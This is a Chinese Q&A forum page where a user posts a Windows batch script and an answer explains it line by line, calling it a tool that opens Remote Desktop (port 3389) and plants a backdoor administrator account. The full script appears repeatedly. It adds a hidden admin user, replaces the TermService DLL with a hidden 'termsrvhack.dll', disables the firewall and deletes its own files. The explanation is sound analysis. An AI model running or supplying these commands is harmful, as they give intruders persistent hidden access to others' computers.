高手帮我看下这段BAT代码
@echooff@ntsd-cq-p732@netuserxiaopeng88306506/add@netlocalgroupadministratorsnew1/add...
@echo off
@ntsd -c q -p 732
@net user xiaopeng 88306506 /add
@net localgroup administrators new1 /add
@REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\System32\termsrvhack.dll /f
@copy c:\termsrvhack.dll c:\windows\system32\termsrvhack.dll
@Attrib +H +S +R C:\windows\system32\termsrvhack.dll
@shutdown -a
@del c:\termsrvhack.dll
@del c:\1.txt
@net stop sharedaccess
@net start dcomlaunch
@net start termservice
@del c:\2.bat
谁给翻译一下 展开
@ntsd -c q -p 732
@net user xiaopeng 88306506 /add
@net localgroup administrators new1 /add
@REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\System32\termsrvhack.dll /f
@copy c:\termsrvhack.dll c:\windows\system32\termsrvhack.dll
@Attrib +H +S +R C:\windows\system32\termsrvhack.dll
@shutdown -a
@del c:\termsrvhack.dll
@del c:\1.txt
@net stop sharedaccess
@net start dcomlaunch
@net start termservice
@del c:\2.bat
谁给翻译一下 展开
1个回答
展开全部
@echo off '关闭回显
@ntsd -c q -p 732 '结束进程ID是732的程序
@net user xiaopeng 88306506 /add '添加一个xiaopeng 密码为88306506的用户
@net localgroup administrators new1 /add ’将用户提权为管理员
’以下部分貌似是在进行克隆账号
@REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\System32\termsrvhack.dll /f
=====================
@copy c:\termsrvhack.dll c:\windows\system32\termsrvhack.dll ‘复制c:\termsrvhack.dll到c:\windows\system32\termsrvhack.dll
@Attrib +H +S +R C:\windows\system32\termsrvhack.dll ’将c:\windows\system32\termsrvhack.dll文件添加隐藏,系统等属性
@shutdown -a ‘停止关机
@del c:\termsrvhack.dll ’删除c:\termsrvhack.dll
@del c:\1.txt ‘删除c:\1.txt
@net stop sharedaccess ’关闭防火墙
@net start dcomlaunch ‘开启dcomlaunch
@net start termservice ’开启termservice
@del c:\2.bat ‘删除c:\2.bat
总结
这是一个开启3389的批处理,外加后门克隆管理员账号等操作
@ntsd -c q -p 732 '结束进程ID是732的程序
@net user xiaopeng 88306506 /add '添加一个xiaopeng 密码为88306506的用户
@net localgroup administrators new1 /add ’将用户提权为管理员
’以下部分貌似是在进行克隆账号
@REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\System32\termsrvhack.dll /f
=====================
@copy c:\termsrvhack.dll c:\windows\system32\termsrvhack.dll ‘复制c:\termsrvhack.dll到c:\windows\system32\termsrvhack.dll
@Attrib +H +S +R C:\windows\system32\termsrvhack.dll ’将c:\windows\system32\termsrvhack.dll文件添加隐藏,系统等属性
@shutdown -a ‘停止关机
@del c:\termsrvhack.dll ’删除c:\termsrvhack.dll
@del c:\1.txt ‘删除c:\1.txt
@net stop sharedaccess ’关闭防火墙
@net start dcomlaunch ‘开启dcomlaunch
@net start termservice ’开启termservice
@del c:\2.bat ‘删除c:\2.bat
总结
这是一个开启3389的批处理,外加后门克隆管理员账号等操作
本回答由提问者推荐
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
杭州一知智能科技有限公司
2022-03-17 广告
电话机器人主要就是用来模拟人工通话的一组程序,一般由,CRM系统,语义识别,转换文字,话术体系,这是软的部分,再加上底层软交换和通信模块一起,合并起来就是一套完整的电话机器人系统。电话机器人可以代替真人进行电话工作的,像是电话营销、售后回访...
点击进入详情页
本回答由杭州一知智能科技有限公司提供
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询
